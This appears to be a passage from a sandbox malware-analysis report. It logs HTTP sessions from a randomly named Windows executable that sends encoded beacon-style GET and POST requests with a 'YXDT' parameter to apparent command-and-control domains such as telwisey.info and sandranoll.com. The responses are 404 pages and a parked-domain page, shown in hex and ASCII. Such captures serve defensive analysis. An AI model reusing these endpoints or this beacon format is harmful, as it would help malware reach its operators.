YXDT=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07q5rZM0+OjY/2XSc8GMvxjjELjP9wk2oJWVNS0hDP8g2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GkZm5WRrxrdAkhCpdsCq6nXO2axeqqxsqYDOyxEj+a7buQ5nwJ1eoHsLYQb210/uznfWWD3DofQLeU/c8swQDQLMEHJPu8Oh9b3dVoL2iAc6qieDbFEMFpX/ZJ+HkqLtOHhiekgZsen4K+RIN6Pjr2+R0+dgEMjuyz+lAQY9Hxc95lAZhBLRw9TzSyy76CIvmeGl475JnpFhKg9pV48amtjJySGPr4BSFZxEvzEasOX6z8fdkJRXBgxweOu1pNj/sxb5vIU2uLF9AJJ6QSbjhlfC7ShdnfDp3mhd82PvuZm08IEJPS6EeihzjeGabvPmZgkG++LObAkDusr9oJswpqRKQHxOhHuUEIsOhLd9e7Kq+BUNwHTv72QjB1jCXCwEm787RW/04S0MhJtc6GoYykfsd8dC9FxGjygw5Y7VNDFDacN82rcUch34GOOB+H7nV2GD+vnnyA/cMam9LyY9v9ss/xoYbsxjjB/awRli6yx5y9nJ11vpDWB8dm2WqCczKAV0r/YuHPSlsUTriFl/eREK8rLOxeIHf8Q6jMiWrJruLqaQwT0z7LYoP6E1ntHpn/xS22MtLWVekCaridGquxvyfg1w863y0dD0aIgkSQ8ARKmIGEf3QkJSYv+YiUI6qTYNnsYAd8LAoIwOxiQwYFUb+WQEsX5fEdqfSVnIYMXntGnXY5aIsmQACpuzE8bJoUOBaI84kmkhwsK8806Art9bDLGFlgmJgZiRGxjXRNA0aQtessm4s [TRUNCATED]
Aug 12, 2024 05:15:47.365048885 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:47 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 12, 2024 05:15:47.365142107 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 12, 2024 05:15:47.365179062 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 12, 2024 05:15:47.365212917 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 12, 2024 05:15:47.365266085 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 12, 2024 05:15:47.365299940 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 12, 2024 05:15:47.365333080 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 12, 2024 05:15:47.365364075 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 12, 2024 05:15:47.365401030 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 12, 2024 05:15:47.365431070 CEST	224	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
Aug 12, 2024 05:15:47.371001959 CEST	1236	IN	Data Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49763	199.192.19.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:49.292229891 CEST	501	OUT	GET /ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.telwisey.info Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:15:49.902158976 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:49 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 12, 2024 05:15:49.902220964 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
Aug 12, 2024 05:15:49.902256012 CEST	1236	IN	Data Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
Aug 12, 2024 05:15:49.902288914 CEST	1236	IN	Data Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
Aug 12, 2024 05:15:49.902322054 CEST	1236	IN	Data Raw: 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c Data Ascii: 386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /
Aug 12, 2024 05:15:49.902354002 CEST	1236	IN	Data Raw: 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 47.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1=
Aug 12, 2024 05:15:49.902386904 CEST	1236	IN	Data Raw: 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 35 30 2e 30 36 36 22 20 63 79 3d 22 33 32 30 2e 32 35 39 22 20 72 3d 22 37 2e 39 35 32 22 20 2f Data Ascii: nd" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="168.303" cy="353.753
Aug 12, 2024 05:15:49.902419090 CEST	1236	IN	Data Raw: 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 Data Ascii: ="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176"
Aug 12, 2024 05:15:49.902452946 CEST	1236	IN	Data Raw: 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d 32 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c Data Ascii: 694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FF
Aug 12, 2024 05:15:49.902487993 CEST	556	IN	Data Raw: 33 34 33 2c 34 2e 33 38 33 2c 33 2e 32 38 39 2c 35 2e 38 33 37 2c 35 2e 37 39 33 0a 09 09 09 09 63 34 2e 34 31 31 2c 37 2e 35 39 36 2c 31 2e 38 32 39 2c 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 Data Ascii: 343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="
Aug 12, 2024 05:15:49.907728910 CEST	1236	IN	Data Raw: 31 38 2e 39 39 39 2c 35 2e 31 33 34 6c 39 2e 36 38 35 2d 35 2e 35 36 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: 18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M241.978,395.324c-3.012-5.25-2.209-11.631,1.51

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49764	213.145.228.16	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:55.417943954 CEST	774	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 37 68 58 78 32 47 39 37 73 75 74 49 59 6b 2f 4b 55 2f 4c 38 77 46 4e 2f 70 75 39 56 58 37 2f 69 51 3d 3d Data Ascii: YXDT=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl67hXx2G97sutIYk/KU/L8wFN/pu9VX7/iQ==
Aug 12, 2024 05:15:56.156547070 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:56 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 4a1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 12, 2024 05:15:56.156574011 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table>85b<tr><td><ta
Aug 12, 2024 05:15:56.156593084 CEST	1137	IN	Data Raw: 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f Data Ascii: 2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/antivirus.png" alt="Antivirus" /></td><td style="width:300px;">Allen Domaintechnik.at Hosting
Aug 12, 2024 05:15:56.161098003 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49765	213.145.228.16	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:57.952933073 CEST	794	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 